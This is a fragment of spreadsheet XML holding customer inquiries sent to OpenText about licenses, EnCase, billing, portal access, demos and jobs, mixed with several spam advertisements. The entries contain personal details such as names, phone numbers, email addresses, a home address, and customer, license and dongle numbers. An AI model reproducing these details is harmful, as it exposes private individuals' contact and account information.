_x000D_
My account don't allow to access licenses validated by SAP. Could you grant my access ? See below the last message of SAP :_x000D_
_x000D_
Information for SAP_x000D_
15.03.2019   10:01:05   SAP BC / 4040 Herstal_x000D_
_x000D_
Hello,_x000D_
 _x000D_
Sorry I didn't find the path you mentioned to get licenses._x000D_
 _x000D_
You wrote : "You can access your Content Server license keys on your My Support_x000D_
portal under the Activations/Keys Tab under SUID: 58718-12410."_x000D_
 _x000D_
I tried My Support portal, the launchpad portal. I never found the tab named "Activations/keys"._x000D_
 _x000D_
I tried the "request license" page but I don't see opentext licenses._x000D_
 _x000D_
Best regards,_x000D_
 _x000D_
Jean-Philippe lejal_x000D_
_x000D_
_____________________x000D_
Information from SAP_x000D_
14.03.2019   19:09:18   SAP_x000D_
_x000D_
Hello Permanence SAPBC,_x000D_
 _x000D_
I am just following up on your request to access your Content Server_x000D_
licenses via your My Support portal._x000D_
 _x000D_
Please let me know if there is anything further I can assist you with_x000D_
at this time._x000D_
 _x000D_
If not, please close this ticket on your end so that I may be able to_x000D_
close it out on mine._x000D_
 _x000D_
Regards,_x000D_
 _x000D_
Krystal Bonnell_x000D_
OpenText Support Team</t>
  </si>
  <si>
    <t>We offer you the opportunity to advertise your products and services. _x000D_
 _x000D_
Ciao! Look at a fine offer for you. I can help you with sending  your commercial offers or messages through feedback forms. The advantage of this method is that the messages sent through the feedback forms are included in the white list. This method increases the chance that your message will be read. The same way as you received this message. _x000D_
Sending via Feedback Forms to any domain zones of the world. (more than 1000 domain zones.). _x000D_
The cost of sending 1 million messages for any domain zone of the world is $ 49 instead of $ 99. _x000D_
Domain zone .com - (12 million messages sent) - $399 instead of $699 _x000D_
All domain zones in Europe- (8 million messages sent) - $ 299 instead of $599 _x000D_
All sites in the world (25 million messages sent) - $499 instead of $999 _x000D_
Domain zone .de - (2 million messages sent) - $99 instead of $199 _x000D_
Domain zone .uk - (1.5 million messages sent) - $69 instead of $139 _x000D_
Domain zone .nl - (700 000 sent messages) - $39 instead of $79 _x000D_
 _x000D_
Discounts are valid until March 25. _x000D_
 _x000D_
Contact us. _x000D_
Telegram - @FeedbackFormEU _x000D_
Skype – FeedbackForm2019 _x000D_
Email - FeedbackForm2019@gmail.com _x000D_
 _x000D_
Sorry to bother you.</t>
  </si>
  <si>
    <t xml:space="preserve">Would like to know if Opentext Document Management System comes with AI capabilites to do autotagging and Optical character recognition (OCR), which recognizes written or image-based content, such as a scanned document, analyze all forms of content, including images, video and audio, to improve findability._x000D_
_x000D_
If possible, can email me the brochures or links to read through. Thanks. </t>
  </si>
  <si>
    <t>Hi Sir/Madam,_x000D_
_x000D_
I am Keerti from VKTree consultants. We provide IT recruitment services to organizations and help them acquire the required talent. We provide both IT and Non-IT Recruitment services. Our services cover the full spectrum of the Recruiting function, from working with you to determine the profile of the candidate(s) you are seeking to providing you the ideal profiles that best suits your requirements. . Please let us know if you can provide us an opportunity to serve you I assure you the best of the services at competitive rates._x000D_
_x000D_
Thanks,_x000D_
Keerti_x000D_
VKTree Consultants_x000D_
Ph:7676567578_x000D_
Website:www.vktree.in</t>
  </si>
  <si>
    <t>DZ</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour_x000D_
Nous sommes une SSII intégrateur SAP implanté en Algérie et nous souhaitons (pour plusieurs de nos clients) proposer la solution Opentext. Svp de nous informer sur les modalités de partenariat comme partenaire (distributeur et intégrateur)._x000D_
</t>
  </si>
  <si>
    <t>Hello, I'm interesting in your product Documentum, where I can see a demo and prices?_x000D_
Best regards,</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning can you tell me if there is a service center in Italy  for the "Vista Plus" software? Thank You. </t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
My name is Tim Lamarre from PwC Japan. We have been using EnCase for quite a few years, however we're running into some issues with some encryption in Windows 10. From the looks of it, your newer versions of EnCase 8 can decrypt those volumes which show up as unallocated space. _x000D_
_x000D_
The problem now is that it is impossible to find the download location for EnCase in your website. Any help on where a download link to the newest version of EnCase 8 would help us in the future._x000D_
_x000D_
Thank you for your time._x000D_
_x000D_
Regards,_x000D_
Tim Lamarre</t>
  </si>
  <si>
    <t>I need to know versions of the following products are released for the Windows Operating System: Windows 10 (64bit) Enterprise LTSB 2015._x000D_
_x000D_
NFS Solo: 14? NFS Solo 15?_x000D_
Exceed: Supports Windows 10 (64bit) Enterprise LTSB 2015   starting from which version?</t>
  </si>
  <si>
    <t>Hi Support, I would like to have access to EnCase Forensic 8 installer please. Our Dongle ID-G2002075370</t>
  </si>
  <si>
    <t xml:space="preserve">Im interested in Encase Certification so i want the details related to the study material with training and cost of certification attempt. </t>
  </si>
  <si>
    <t>Interested in Engineering Services and/or training availability for using Blazon for .pdf water marking when document is open via LiveLink</t>
  </si>
  <si>
    <t>We are searching a contractor for supporting B2B integrations. The individual needs to be hands-on, an executor. The duration is approximately 3 months. The work location is Oakland, CA.</t>
  </si>
  <si>
    <t>Hi, I have registered for fax2mail, however am not receiving faxes. I have confirmation the faxes are being sent from sender numbers. The fax number is +64 9 9128173. Can you please advise why faxes are not coming through? Many thanks, Christabel</t>
  </si>
  <si>
    <t>I am interested in your Opentext Capture Center and what the cost would be for one user?</t>
  </si>
  <si>
    <t>Our Encase SMS Maint Support Renewal Program contract #SC2016134 expired on Dec. 27, 2018.  Could someone please email me a quote for renewal, for the term of one year?  Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">1. I clicked Confirm Registration and the web page stated that I had successfully activated my account, but when I go to Knowledge Base/Open a Ticket it states that I haven't confirmed my registration yet._x000D_
_x000D_
2. Please add me to the same group as my coworkers theo.hidley@pnc.com and harry.douglass@pnc.com for PNC/PNC Real Estate._x000D_
_x000D_
SUID_x000D_
QA: 44942-12489_x000D_
PROD: 86669-12313_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">As companies look to expand their industry reach, this can be done faster and with more efficiency by finding INDUSTRY experts for this challenge. My solutions are focused on the Federal, oil and gas exploration, and Industrial equipment Industries, which have great growth potential for this technology._x000D_
_x000D_
If you would like to discuss my process for making this path to new opportunities much faster, then please contact me._x000D_
_x000D_
Eric Wise_x000D_
1-302-731-4206_x000D_
 </t>
  </si>
  <si>
    <t>Hi, I worked at OpenText as a co-op student from Jan - April in 2018. I have not received my T4 tax form yet. Could you please confirm if you can send it to this address: 1028 Zimmerman Crescent, Milton, ON. Thanks, Trisha.</t>
  </si>
  <si>
    <t>We became your customer when Opentext bought out EasyLink fax services.  We are still on that legacy product, and would like to learn more about your OpenText Fax2Mail and consider transitioning to that product/service.  Our customer number is 0000000078821.</t>
  </si>
  <si>
    <t xml:space="preserve">I would like some information on the product offering you have for Records Management. Please have someone contact me. </t>
  </si>
  <si>
    <t>I need to get in touch with someone in CA to help with the license transfer from currently contract holder (Conduent) to future contract holder (IBM).</t>
  </si>
  <si>
    <t>Our engineering groups are responsible for generating documents for various purposes and it's all manual. We have created document templates in word, etc. and we are looking for automating the document generation to the extent possible. Want to understand seriously if OpenText has a solution for this. Appreciate your quick response.</t>
  </si>
  <si>
    <t>I represent Ibee Suppliers Inc. and we are looking to become a partner with Gordman's, we have a frame manufacturing facility in the border city of Tijuana Mexico. Can you please provide the contact information for the appropriate purchasing department so I can contact them and start our registration._x000D_
Thank you for your help._x000D_
José Solís</t>
  </si>
  <si>
    <t>I am applying gor employment but I cannot upload resume I am receiving a error.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Greetings!_x000D_
_x000D_
Good day to you. I hope everything is fine. I just send this e-mail you to ask for your special pricing for the item/s below. And kindly fill out the inquiries respectively. _x000D_
_x000D_
Base Year_x000D_
 _x000D_
Option Years_x000D_
  _x000D_
SHIPPING ADDRESS:_x000D_
_x000D_
1.	Availability / on hand_x000D_
2.	Lead time_x000D_
3.	ETA _x000D_
4.	Taxes _x000D_
5.	Mode of payment_x000D_
6.	Credit card fee _x000D_
7.	Freight charge _x000D_
8.	Handling fee _x000D_
9.	Country of Origin_x000D_
10.	Place of Manufactured_x000D_
11.	Products Specification Sheet_x000D_
_x000D_
_x000D_
Please send a formal quote and kindly attach Product/ Service Warranty &amp; Return Policy. If you have any concerns, please feel free to contact me. Thank you so much. And have a great day!_x000D_
_x000D_
_x000D_
_x000D_
Very Respectfully,_x000D_
_x000D_
Irene Pia C. Thompson_x000D_
Account Executive_x000D_
(443) 341-1779| (443) 927-7378 |  pia@royalimagingsolutions.com_x000D_
|  2603 N. Rolling Rd Ste 304   Windsormiil, MD    21244_x000D_
CAGE: 50YY0|  GSA Contract: GS-02F-0043V | DUNS Number: 809844538_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Customer ID = 10197955_x000D_
Renewal No. = RC202501_x000D_
Support Contract No. = 0012257250_x000D_
_x000D_
1) How many EXCEED and Exceed XSesson licenses are currently owned by ACS/Xerox/Conduent (for use in our California Medicaid "CA-MMIS" management information system)?_x000D_
_x000D_
2) When do they expire?_x000D_
_x000D_
3) Are the EXCEED and Exceed XSession licenses transferable to IBM?  Background: ACS/Xerox/Conduent will no longer be the prime contractor for CA-MMIS to the State of California from 10/1/2019 onward.  IBM has been the ACS/Xerox/Conduent sub-contractor operating CA-MMIS and will be the prime contractor to the State from 10/1/2019 onward._x000D_
_x000D_
4) Who should IBM contact to obtain go-forward quotations for EXCEED and Exceed XSession?_x000D_
_x000D_
Thank-you.</t>
  </si>
  <si>
    <t>Companies House are seeking assistance in migrating to a SharePoint document management solution.</t>
  </si>
  <si>
    <t xml:space="preserve">I'm researching Digital Asset Management for Video.  We have a large NetApp footprint for file and objectstorage.  I'm doing some preliminary research to see if we can leverage some of the existing infrastructure.  </t>
  </si>
  <si>
    <t>our service is up for renewal on 3/31. Please send me a quote for renewal...if possible please send me two quotes: one year and a three year renewal. Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">Im looking for a quote for a local college RFP. They are looking for a fax solution as a new tool. They currently have an Avaya phone system, but will be replacing it with a Cisco VOIP solution in the near future. All devices will be HP 700 or 800 series printers/MFP's. They will have roughly 158 devices. 1 server, no redundancy needed. They place about 400 incoming faxes per month, 100 outbound faxes per month. </t>
  </si>
  <si>
    <t xml:space="preserve">We are an existing Partner and I am trying to reach our Partner Representative.We made a couple of sales a number of years ago and have had the product on the shelf for a while but now have a few prospects that we believe would be a good fit. I have reached out to our rep at the time but have not had any response._x000D_
_x000D_
Could you please provide us with a eval license (last we have has expired) so we can demo the OCC offering. Also the latest version we have installed is 10.1 build 10.1.8. Please let us know if there is a later version and if so where we can obtain it._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Currently we are using open text xPression 4.6. Need to know what is the latest version of xPression tool that is rolled out in the market. </t>
  </si>
  <si>
    <t>ND</t>
  </si>
  <si>
    <t>CenturyLink (office out of Bismarck ND--some Monroe, LA accounts have been transferred here) is trying to update its business billing contact information. We would like to know who at Open Text handles the bills from CenturyLink, the person's name, email, and phone; or the general department name can work--e.g., Accounts Payable @... AP Dept phone, etc. Thank you for your help on this.</t>
  </si>
  <si>
    <t>Hello, _x000D_
I was told your software integrates with NetSmart (our EMR) if so can we get the process started in providing a quote? Please contact me via email wwhite@wilshirehcs.org.</t>
  </si>
  <si>
    <t>we're looking for an alternative EDI solution to Radley ICARAS to work with IFS Apps 8 and came accross Open Text in conversation with an IFS consultant.</t>
  </si>
  <si>
    <t>Hello Sir / Ma'am,_x000D_
I would like to enquire on OpenText™ Business Center for SAP Solutions®. I understand that this solution empowers customers to simplify data entry and validation; digitize incoming documents including paper, email, PDFs and fax; and speed workflow. My company is interested in a solution that can help simplify/translate data from my customer PO (PDF) into my company back end system for sales order processing. Would you kindly please call me back to discuss more._x000D_
Thanks! _x000D_
Best regards,_x000D_
Chin Hock</t>
  </si>
  <si>
    <t>We recently renewed our support contract for RightFax but when I called into customer service, they said our contract expired March 11, 2019 and would not provide support. This was after I provided the SUID number. Is there a new number?</t>
  </si>
  <si>
    <t>Hi - I was wondering if our account is still active.  I am not able to log in.  Account number is 127244574225</t>
  </si>
  <si>
    <t>I received an email from "Accounts Receivable Shared &lt;acctsrecshared@opentext.com&gt; with an attached invoice that shows my account is 17 days past due.  It referenced Invoice Number   9001033308 and Reference Document Number 1903780878... and prompted me to pay via "epay" an amount of $7.10._x000D_
_x000D_
Their email listed me as customer # 0010281332; but my customer ID on my login page lists my customer ID as 780878._x000D_
_x000D_
My account has been set up for year for auto pay and this is the first time I've ever received such a notice.  Checking my bank records, I can see that all of my payments have been coming out regularly and all have cleared.  _x000D_
_x000D_
I assumed that my card on file had lapsed and needed to be update... but when I went online to my account, I was unable to update the information.  _x000D_
_x000D_
Based on all of the inconsistencies, I am questioning whether this email was authentic.  I want to verify and make sure that my account is in good standing.  I look forward to your response._x000D_
_x000D_
Kevin Dunn</t>
  </si>
  <si>
    <t>open text</t>
  </si>
  <si>
    <t>Is directly interview is conducting at madhapur in hyderabad or only registration</t>
  </si>
  <si>
    <t>Hi, _x000D_
I have a few questions regarding one of your solutions. Does OpenText Rights Management also encrypts data (scanned PDFs) from an existing windows based file repository? And does the solution offer an audit trails of who and when a user opened any of the PDF files? Encrypted documents can be shared with externals (example via email)?_x000D_
Thank you!_x000D_
_x000D_
Kind regards,_x000D_
Alexandra Duricu</t>
  </si>
  <si>
    <t>We are interested in a demo of your ECM product.</t>
  </si>
  <si>
    <t xml:space="preserve">I need to know if we have a designated rep for Hunter Fan. We currently use the iSeries version of Trusted Link but I am interested in using the Windows version. I also need pricing for using you as our VAN. </t>
  </si>
  <si>
    <t>I see that we can pay our invoices by Credit Card on your website.  Is there a charge for paying this way?_x000D_
Thank you_x000D_
Pam</t>
  </si>
  <si>
    <t xml:space="preserve">    I have a customer who's outbound faxes are showing the follow message.. (Awaiting Compliance) can you tell me what this message means.</t>
  </si>
  <si>
    <t>Imeyu litsenziyu na vash produkt. moi klyuchi nomer G2002074191. ya khochu poluchit' posledniye versii programmnogo obespecheniya dlya etogo klyucha. pochemu ya seychas ne mogu sdelat' eto cherez lichnyy kabinet? ran'she mne prosto prikhodilo pis'mo so vsemi ssylkami na fayly._x000D_
Развернуть_x000D_
254/5000_x000D_
I have a license for your product. my keys number is G2002074191. I want to get the latest software for this key. Why I can not do it now through my personal account? Earlier I just received a letter with all the links to the files.</t>
  </si>
  <si>
    <t>I need to request a quote for a license renewal regarding two license keys for Encase Forensic._x000D_
V139703766U, V334349922U</t>
  </si>
  <si>
    <t>I am interested in the Sr. HR Business Partner Role at your Waterloo location and I am having difficulty submitting my application through your site. Every time I reach the page that says "Thank you for your input the rest of the process will be in English" I click next and it takes me back to the "explore opportunities" page. I have not received an email confirming receipt of my application. I have tried several times this morning with the same result and I'm hoping that you have received it, but you may have received several applications. _x000D_
_x000D_
If I could receive a response as to whether my application was received it would be greatly appreciated. If my application has not been received I would be happy to forward it to you via another avenue._x000D_
_x000D_
I look forward to your reply._x000D_
_x000D_
Thank you very much,_x000D_
Tanya Postma, CHRL</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
ich habe mich gestern über ihre Seite registriert und die Registrierung auch bestätigt _x000D_
(Registration Confirmation). Wir haben ihr Produkt (Vendor Invoice Management by OT)  über die SAP gekauft. Nun möchte ich gerne die benötigten Dateien herunterladen. Könnten sie mich bitte für den Bereich MySupport freischalten._x000D_
Für ihre Unterstüzung bedanke ich mich schon im Voraus._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Herbert Kukla</t>
  </si>
  <si>
    <t>JE</t>
  </si>
  <si>
    <t xml:space="preserve">Our Reference: SOR279625/C00027032_x000D_
Your reference: P726135_x000D_
End user Reference: 0000051091 _x000D_
_x000D_
Re. the above references I have been tasked with distributing these licences to users, but I don't have any credentials for your site and no one seems to know the credentials associated with the purchase - Are you able to advise if there is an email address registered with you that is linked to these purchases?_x000D_
_x000D_
Thanks,_x000D_
Hugh_x000D_
</t>
  </si>
  <si>
    <t>In need of the RightFax 10.6 Web API Documentation.  Please send or provide link.</t>
  </si>
  <si>
    <t>We are looking to replace our ECM application with a new product.   If you would like to respond to our RFP, please provide me with the appropriate contact information</t>
  </si>
  <si>
    <t>WE are facing a problem with OpenText Enterprise Scan 16.2.0  running on SAP GUI 7.5 PL 8.1. The layout in Vendor Invoice Management  is not shown properly. (how can I attach images here ? ).  _x000D_
Question 1 : _x000D_
Is OpenText Enterprise Scan 16.2.0 compatible with SAP GUI 7.50 PL 8.1 ? _x000D_
Question 2 : _x000D_
Is OpenText Enterprise Scan 16.2.0 compatible with Windows 10 pro ?_x000D_
Question 3 :_x000D_
Why are this informations not in the Compatibility Matrix you provide on this portal ?_x000D_
_x000D_
Best Regards,_x000D_
Fausto</t>
  </si>
  <si>
    <t>Need to discussion CMC cloud application</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I would like to sign up for Vendor Invoice Management (VIM) for SAP Business Users_x000D_
but it seems that there is an error in price for English language training._x000D_
Can you please update the price on the website in order for me to sign up for the course and pay the correct amount and not 14,400.00_x000D_
_x000D_
Please let me know when the price has been corrected._x000D_
_x000D_
Thank you_x000D_
_x000D_
Anete de Kruif</t>
  </si>
  <si>
    <t>Hello,_x000D_
I tried to upgrade one of my machines to the latest version of EnCase, but it says my sms license is expired. My dongle ID is V1647251413</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I am trying to get in contact with someone on your side that handles the Liberty Mutual account. I was recently hired at Liberty to be their digital asset manager, and I trying to get a better understanding of their MediaBin tool._x000D_
_x000D_
I have reached out to you guys a couple of times, and have not heard back and not sure if I am using the correct inquiry type._x000D_
_x000D_
Look forward to hearing from you soon._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Katrina</t>
  </si>
  <si>
    <t>We're a current customer, looking for more information on ECM products and solutions.  Call/email for more details.</t>
  </si>
  <si>
    <t>ZM</t>
  </si>
  <si>
    <t xml:space="preserve">I wish to find out if there are OpenText CMS that i can use to work with so as to assess possibility of using an Open Source platform to plug into for display </t>
  </si>
  <si>
    <t xml:space="preserve">I just noticed that with Persuasion 5.6.2 there is no more LotusNotes-connector available - because of the change from 32 to 64bit._x000D_
Is there any possibility to use LotusNotes-connector further?_x000D_
Otherwise we can not make any more upgrade on Persuasion because we are bound to use LotusNotes._x000D_
Finding and changing all existing connections to SMTP-Mail would probably take a year of work...._x000D_
_x000D_
Kind regards_x000D_
Stefan Mayer_x000D_
</t>
  </si>
  <si>
    <t>Hi_x000D_
This is regarding VIMI-13646._x000D_
We have an issue where the DP log shows that a user has touched a DP document but /OPT/VIM_PROD1 is not showing any reference to that user.  /OPT/VIM_PROD1 shows another system user who also touched the document but not another user.</t>
  </si>
  <si>
    <t>Saudações,_x000D_
A estamos em busca em soluções para gestão de documentos arquivísticos. Gostariamos de conhecer as opções que a OpenText disponibiliza._x000D_
_x000D_
Aguardamos contato.</t>
  </si>
  <si>
    <t>BZ</t>
  </si>
  <si>
    <t>My Support Page doesn't load post log in</t>
  </si>
  <si>
    <t>This Is Sameeksha Sharma, having 6.7 years of experience in opentext Documentum, core java, and worked with Tata Consultancy Services,Pune India._x000D_
_x000D_
_x000D_
_x000D_
I am a quality-oriented professional who has been consistently praised as quality-oriented by my co-workers and management. Over the course of my 6.7 –year career, Overall, I have consistently demonstrated Analytical and technical skills, problem solving, leadership and excellent communication abilities in every aspect of my System Software Engineer Role at Tata Consultancy Services, and I invite you to review my detailed achievements in the attached resume._x000D_
_x000D_
_x000D_
_x000D_
Please contact me at +46764466014 or via email at sameek1212@gmail.com to arrange for a convenient meeting time. During our meeting I will be happy to explain in detail the work experience gap on my resume, at which time I was required to care of my child.I am willing to start my career again._x000D_
_x000D_
_x000D_
_x000D_
Thank you for your consideration, and I look forward to hearing from you soon._x000D_
_x000D_
I look forward to elaborating on how my specific skills and abilities will benefit your organisation.</t>
  </si>
  <si>
    <t>Hi, We are using Content Server 16 and have tempo box in house for sharing with external parties. However, now we are having an issue with respect to performance using the Browser URL so we wanted to know the applications that can perform the same task  something similar to TempoBox Mobile App. We are looking to Desktop or PC App having windows 10. _x000D_
_x000D_
Thanks and appreciate._x000D_
Jamil</t>
  </si>
  <si>
    <t>I have already sent a letter for three days and I have not responded. I am very anxious to ask questions. I can't enter "My Supports" to ask questions. Please solve them as soon as possible.</t>
  </si>
  <si>
    <t>SZ</t>
  </si>
  <si>
    <t xml:space="preserve">Boss&amp;Hall — подбираем статусные объекты для узкого круга покупателей _x000D_
На сегодняшний день только элитный сегмент рынка недвижимости Москвы отличается относительной гибкостью. К сожалению, этого пока недостаточно, чтобы учесть потребности каждого отдельно взятого клиента с его особыми требованиями и пожеланиями. _x000D_
При возведении элитных жилых комплексов застройщик все равно ориентируется на заложенные в проектной документации виды планировок и особенностей будущего жилья. Чтобы Ваша квартира максимально отвечала всем высказанным пожеланиям, брокеры Boss&amp;Hall помогут выбрать 3-4 наиболее подходящих варианта из нескольких десятков проектов строительных компаний. _x000D_
Компания Boss&amp;Hall готова предоставить в Ваше распоряжение личного эксперта по рынку элитной недвижимости Москвы, который найдет для Вас лучший объект на индивидуальных условиях. _x000D_
Boss&amp;Hall — воплотим все Ваши мечты о комфортной жизни в одной квартире _x000D_
Выбор элитной недвижимости, наверное, самая тяжелая и сложная, хотя и приятная покупка в нашей жизни. Нередко приходится буквально разрываться между шикарным видом из окна, близостью к центру и запавшей в душу больше других изысканной внутренней отделкой. _x000D_
Как сделать так, чтобы все понравившиеся Вам параметры стали частью одной клубной квартиры? В компании Boss&amp;Hall работают эксперты по недвижимости, которые знают, как воплотить Вашу мечту в реальность. Возможности столичного рынка практически безграничны, и мы готовы приложить все усилия, чтобы отыскать для Вас тот самый, единственный вариант. _x000D_
Boss&amp;Hall — поможем выбрать идеальную квартиру и сэкономить время _x000D_
Стоимость хорошего элитного жилья измеряется десятками миллионов рублей. За эту сумму Вы хотите и рассчитываете получить определенный уровень комфорта, заранее оговоренный набор привилегий и дополнительных преимуществ. _x000D_
Большинство застройщиков готовы дать Вам основу, скажем, клубную квартиру или пентхаус, который примерно на 50% соответствует параметрам Вашей мечты. Чтобы довести проект до ума, </t>
  </si>
  <si>
    <t>... nach gestrigen telefonischer Kontaktaufnahme mit Ihnen und Abgleich der Vertragsdaten wollte ich heute bei Ihnen ein Support Ticket eröffnen. Ich bekomme aber beim öffnen der Seite folgende Meldung This site encountered an error. Please contact connect@opentext.com. Bitte um Kontakt um evtl. telefonisch ein Supportticket zu eröffnen._x000D_
Vielen Dank!_x000D_
Mit freundlichen Grüßen_x000D_
Stefan Kloock</t>
  </si>
  <si>
    <t>Dear OpenText Team,_x000D_
_x000D_
We are part of Mabanaft Group and use SAP with OpenText. We would like to seek clarification regarding OpenText functionality to scan invoices and save them to SAP from the perspective of Singapore Evidence Act. _x000D_
_x000D_
Section 116A of the Evidence Act lays down a presumption i.e. using a Certified Imaging System (known as "approved process") which has been certified by an independent body appointed by the Ministry of Law (known as Certifying Authority) as reasonably ensuring accurate conversion of physical documents to electronic images. _x000D_
_x000D_
Our queries are as below:_x000D_
1. Is the Open Text solution certified to meet the above requirements of Singapore Evidence Act? _x000D_
_x000D_
2. Do we as end-users need to obtain any additional certifications to meet the requirements of Evidence Act?_x000D_
_x000D_
Thanks in anticipation of an early reply.</t>
  </si>
  <si>
    <t xml:space="preserve"> I'm looking for a small long</t>
  </si>
  <si>
    <t>we have purchased your product- Encase forensic tool Version 8, we don't know how to configure it, we need help from your side to configure the tool.</t>
  </si>
  <si>
    <t>Hi, we are interested to learn more about your products wrt e-Records management.  Can I have an email contact for Singapore?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
Once I complete virtual class for VIM for SAP consultants, will I be getting any completion certificate from OpenText? _x000D_
_x000D_
Also, do you any certification program based on training and I get certified post training._x000D_
_x000D_
Thanks_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I currently have a dongle and it is issued through US Army and I am unable to update it. I have contacted my POC and they advised to reach out to you. Support would be greatly appreciated as I need to access EnCase 8. Thank you. </t>
  </si>
  <si>
    <t>Is it possible for me to download an evaluation version of OpenText Exstream software including its technical documentation? Thank you</t>
  </si>
  <si>
    <t>FJ</t>
  </si>
  <si>
    <t xml:space="preserve">I'm unable to access MySupport page.  I get a "No Access" message and confirming my email address doesn't appear to make any difference.  </t>
  </si>
  <si>
    <t>I received a letter and email saying that Open text merged with Xpedite Systems which was my efax provider. Evidently the billing needs to be updated but the links sent in the email did not come with instructions. Please let me know how to login or how to pay and update my billing.  You can call me at 707-529-3220 California time.  Thanks</t>
  </si>
  <si>
    <t>Looking for a fast, reliable, secured remote login solution.  Don't know which product of Opentext is right for us.  Need advice.</t>
  </si>
  <si>
    <t>Good day_x000D_
I hope you are having a great day so far! My name is Tina Khalili; I'm a very dedicated, passionate and hard working Human Resources and Sr. Administration Professional. I am seeking an HR role in your organization and I believe that my experience, passion and skills will be of asset to your team. I would really appreciate the chance to meet face to face with your hiring managers/resources professionals to discuss the opportunity for an interview. I look forward to hearing from you and would really appreciate if I could be put in touch with the hiring team; I am very interested in working for and representing your organization!_x000D_
_x000D_
thank you in advanced_x000D_
_x000D_
Tina Khalili</t>
  </si>
  <si>
    <t xml:space="preserve">i am a final year student at London metropolitan university with student ID 16017624. I am doing my dissertation on " the comparison of  the data extraction capabilities of  commercial forensic toolkits". unfortunately the forensics lab in my university do not have the full licence for Encase. I was wondering if your company could kindly  give me access to a free trial version of encase for a couple of days to enable me complete my investigations.   </t>
  </si>
  <si>
    <t>The credit card being charged has changed and I am trying to set up auto payments but I can not find a way to do that.</t>
  </si>
  <si>
    <t xml:space="preserve">To whom this may concern at Open Text,_x000D_
_x000D_
The Canadian Environmental Assessment Agency (the Agency) is in the process of data collection for a Site C litigation case. The Department of Justice (DOJ) will be collecting all electronic and physical documents from the Agency. _x000D_
_x000D_
The Agency uses GCDocs operated by Open Text as the Document Management System to store all our documents online. This system is not compatible with the one used by DOJ, who requires the documents be transferred to a USB while preserving the metadata. DOJ suggested using a third party tool (Object Exporter, XML Export, Transport Warehouse); however, our IT services do not have the ability to download third party software. The Agency does not have any guidance or previous experience in conducting this process.  _x000D_
_x000D_
We would like to request your help and advice on how we can proceed to extract documents from GCDocs onto a USB with the metadata preserved. _x000D_
_x000D_
Thank you,_x000D_
_x000D_
Katherine_x000D_
</t>
  </si>
  <si>
    <t>Please provide a quote for purchasing three (3) Exceed 14 and two (2) Exceed XDK 14 licenses._x000D_
_x000D_
Thank you,_x000D_
Seung</t>
  </si>
  <si>
    <t>I would like my account to be attached to the athenahealth account. our end user number is 10162454</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to pay my bill but can’t find on your site how to pay it. </t>
  </si>
  <si>
    <t xml:space="preserve">I want to cancel this account. _x000D_
Invoice Number	Reference Document Number	Document Date	Date Due	Days Past Due	Amount	Currency_x000D_
9001034626	1903857171	2/28/2019	3/30/2019	-17	12.95	USD_x000D_
Total	12.95	USD_x000D_
Thank you. _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Recently attempted to log on to the system to download updates for my existing EnCase dongle (ID #: 735614186 - Cobb County Police Department). System advises that my email is registered, but when I attempt to set a new password with the emailed link I get "Error resetting password." </t>
  </si>
  <si>
    <t>Do u have documentation link for Captiva 7.6 version? like to explore few options for 7.6 where if it has outbount SOAP/REST calls or DB storage access inbuild.</t>
  </si>
  <si>
    <t>We are looking for assistance to upgrade our Documentum installed in Venezuela</t>
  </si>
  <si>
    <t xml:space="preserve">I received a bill from you(?) by email stating I owe $99. There is no supporting documentation and I do not remember ever using your services._x000D_
This may be a phishing scheme, so if I do owe you money please send the invoice to bmackey@btmtechsvcs.net._x000D_
If you want a copy of the email reply to the same address._x000D_
_x000D_
Thank you, _x000D_
Brian Mackey_x000D_
</t>
  </si>
  <si>
    <t>Need the download install for Open Text Exceed_x000D_
License number V1125-32001 &amp; customer id EU0036486.</t>
  </si>
  <si>
    <t>How can I view the sql query behind a report in the report builder?  When I click on Define Query I am warned that I will delete the existing query.  There must be a way to see the sql, isn't there?_x000D_
Thanks for your help.</t>
  </si>
  <si>
    <t>We are looking for Open text license for SAP Hana Archiving, please be in touch._x000D_
INDIA phone numbers: 9989647091,9030003591</t>
  </si>
  <si>
    <t xml:space="preserve">Assistance in designing an active/active DCTM installation where site 1 &amp; 2 are geo-separated. Example:_x000D_
_x000D_
? Requirement: both sites must be able to work independently if the connection between them is cut._x000D_
_x000D_
Example:_x000D_
_x000D_
Site A = West Coast_x000D_
Site B = East Coast_x000D_
_x000D_
User C goes to VIP &amp; load balanced to site A. User C is loading 10,000 files. _x000D_
_x000D_
User D goes to VIP &amp; load balanced to site B. The moment user C is done loading, user D begins to export the 10,000 files from site B._x000D_
_x000D_
Is this possible with a Primary/Secondary CS installation? I don't think so - I think both CS's need to be co-located with the DB &amp; storage for that scenario to work. If the connection dies between the sites, the secondary site dies._x000D_
_x000D_
It would work with a remote content server, however that doesn't fit business requirements to have both sites work independently if the connection is cut._x000D_
_x000D_
Could do two primary sites, each with it's own docbase &amp; replication. If connection is broken, each site still works. Replication is broken but each site will function independently._x000D_
</t>
  </si>
  <si>
    <t>Looking to connect with a POC in regards to the Library of Congress NAVCC opportunity.  We are an incumbent on a related application at the NAVCC facility and looking to discuss partnering.</t>
  </si>
  <si>
    <t>Interested in setting up a demo of your Media Management and Digital Hubs products</t>
  </si>
  <si>
    <t>I have repeatedly tried to contact you regarding my account.  I need to update my payment method.  Can someone please, please call me._x000D_
_x000D_
Tim_x000D_
815-455-9529</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning, _x000D_
_x000D_
